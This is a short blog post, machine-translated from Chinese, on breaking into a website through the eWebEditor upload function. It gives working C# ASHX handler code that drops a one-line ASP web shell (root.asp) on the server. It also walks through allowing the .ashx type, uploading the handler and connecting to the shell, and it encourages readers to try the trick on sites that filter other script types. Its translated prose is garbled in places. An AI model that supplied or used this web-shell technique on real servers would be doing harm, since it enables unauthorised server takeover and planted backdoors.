Eweb breaks through the upload restriction and ashx suffix Script Execution

By default, the eweb database is added to the backend. You can add the upload style upload formats, such as asa, cer, and cdx. However, when uploading files, the system will not move, at that time, I wanted to install the bird web firewall (then I took down the server and filtered out the asa, cer, cdx, htr, aspx, php, jsp, and other scripts ). Required!

What is the breakthrough solution? I saw icysun on the forum today and posted a post asking how to filter common scripts. First come

Common scripts are filtered out except PHP, but JSP does not. Unfortunately, php jsp Parsing is not supported.

Here we can also add an ashx script type. Use ashx to write an asp sentence to the current directory.

The Code is as follows.

<% @ WebHandler Language = "C #" Class = "Handler" %> using System; using System. web; using System. IO; public class Handler: IHttpHandler {public void ProcessRequest (HttpContext context) {context. response. contentType = "text/plain"; StreamWriter file1 = File. createText (context. server. mapPath ("root. asp "); file1.Write (" <% response. clear: execute request (\ "root \"): response. end %> "); file1.Flush (); file1.Close () ;}public bool IsReusable {get {return false ;}}}

Save as ashx. Now let's add an ashx upload type.

Uploaded successfully and accessed directly

Http://www..xxxxx.com/admin/eWebEditor/UploadFile/201082143554545. ashx will generate a root. asp statement trojan in the current directory.

Looking at the uploaded file, root. asp is already lying there. Use a sentence from lake2 to connect and see the friendly hello word! It's done manually.

Sometimes the website filters out common script types but exposes ashx. You can try it. The rookie article is a joke.

 

From Mu blog